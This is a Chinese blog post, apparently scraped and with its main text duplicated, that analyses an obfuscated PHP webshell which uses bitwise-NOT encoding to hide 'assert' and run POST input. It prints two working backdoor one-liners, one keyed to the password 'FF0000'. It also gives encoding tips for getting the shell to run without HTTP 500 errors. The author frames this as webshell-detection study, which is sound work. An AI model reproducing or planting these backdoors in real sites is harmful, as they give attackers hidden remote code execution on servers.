PHPwebshell分析
2016-01-07 17:40
585 查看
这几天已知在做webshell的检测,JSP的不说了,特征检测起来很好匹配到,而且全是一家亲,互相模仿的居多。
今天看了一篇文章,看到14年蘑菇的webshell的后门然后很不错。
============================================
是按位取反。~
PHP: 位运算符 - http://www.php.net/manual/zh/language.operators.bitwise.php
~ $a Not(按位取反) 将 $a 中为 0 的位设为 1,反之亦然。
PHP 的 ini 设定 error_reporting 使用了按位的值,提供了关闭某个位的真实例子。要显示除了提示级别之外的所有错误。
php.ini 中是这样用的: E_ALL & ~E_NOTICE
具体运作方式是先取得 E_ALL 的值: 00000000000000000111011111111111
再取得 E_NOTICE 的值: 00000000000000000000000000001000
然后通过 ~ 将其取反: 11111111111111111111111111110111
最后再用按位与 AND(&)得到两个值中都设定了(为 1)的位: 00000000000000000111011111110111
这里定义$x变量为ASSERT,然后密码为FF0000直接链接后门便可,因为当位取反出来'乱码'后我们再取一次反即可返回正常值。
当重现这个后门的时候我发现,直接Copy过来的直接HTTP状态500,源头是编码问题,上面这种'乱码'其实为西欧(ISO-8859-15)。
实际过程中我们遇到了多次后门无法链接出现500的错误均势因为编码问题,如果默认编码无法识别将编码方式保存为这种即可(GBK\UTF8\...均不能成功使用)
<?php @$code = ~邽崓瀱爳瀼纵瀸專嚿蕧嬢幼瀺崬喼蹱含嚔帜;@$s1 = ~瀸寶崑;@$s2 = ~繗墳撟蹨悰氈;@$s1($s2);?>
例如这样
访问后代码还是一样会运行的。
更多的细节可以看:http://www.2cto.com/Article/201402/277032.html
相关资料https://github.com/laterain/pwaavt/blob/master/bitwise.php
今天看了一篇文章,看到14年蘑菇的webshell的后门然后很不错。
============================================
是按位取反。~
PHP: 位运算符 - http://www.php.net/manual/zh/language.operators.bitwise.php
~ $a Not(按位取反) 将 $a 中为 0 的位设为 1,反之亦然。
PHP 的 ini 设定 error_reporting 使用了按位的值,提供了关闭某个位的真实例子。要显示除了提示级别之外的所有错误。
php.ini 中是这样用的: E_ALL & ~E_NOTICE
具体运作方式是先取得 E_ALL 的值: 00000000000000000111011111111111
再取得 E_NOTICE 的值: 00000000000000000000000000001000
然后通过 ~ 将其取反: 11111111111111111111111111110111
最后再用按位与 AND(&)得到两个值中都设定了(为 1)的位: 00000000000000000111011111110111
<?php $x=~Ÿ¬¬º«; $x($_POST[~¹¹ÏÏÏÏ]); ?>
这里定义$x变量为ASSERT,然后密码为FF0000直接链接后门便可,因为当位取反出来'乱码'后我们再取一次反即可返回正常值。
当重现这个后门的时候我发现,直接Copy过来的直接HTTP状态500,源头是编码问题,上面这种'乱码'其实为西欧(ISO-8859-15)。
实际过程中我们遇到了多次后门无法链接出现500的错误均势因为编码问题,如果默认编码无法识别将编码方式保存为这种即可(GBK\UTF8\...均不能成功使用)
<?php @$code = ~邽崓瀱爳瀼纵瀸專嚿蕧嬢幼瀺崬喼蹱含嚔帜;@$s1 = ~瀸寶崑;@$s2 = ~繗墳撟蹨悰氈;@$s1($s2);?>
例如这样
访问后代码还是一样会运行的。
更多的细节可以看:http://www.2cto.com/Article/201402/277032.html
相关资料https://github.com/laterain/pwaavt/blob/master/bitwise.php
相关文章推荐
- SHELL 简单脚本 更新中
- Android Studio 运行shell
- Linux shell ${}简单用法
- python模拟shell
- linux中shell变量$#,$@,$0,$1,$2的含义解释
- 让python(shell)脚本可执行
- Linux——note shell常用命令 cut 、sort、unqi、tee、tr、split和shell中连接符&& ||
- Ubuntu 安装之后要做的事
- Ubuntu root用户密码设置以及环境变量
- Bash的24个陷阱分析
- 17.shell脚本编程(2)
- Linux Shell删除某一个目录下的所有文件夹(保留其他文件)
- 那些年我们一起做过的shell面试题(二)
- xshell window远程到linux服务器,文件传输
- 启动spark-shell
- SHELL变量的几个小题目
- adb 安装apk到指定手机 登录shell
- bash之三 脚本练习以及算术运算
- 我的shell练习
- 那些年我们一起做过的shell面试题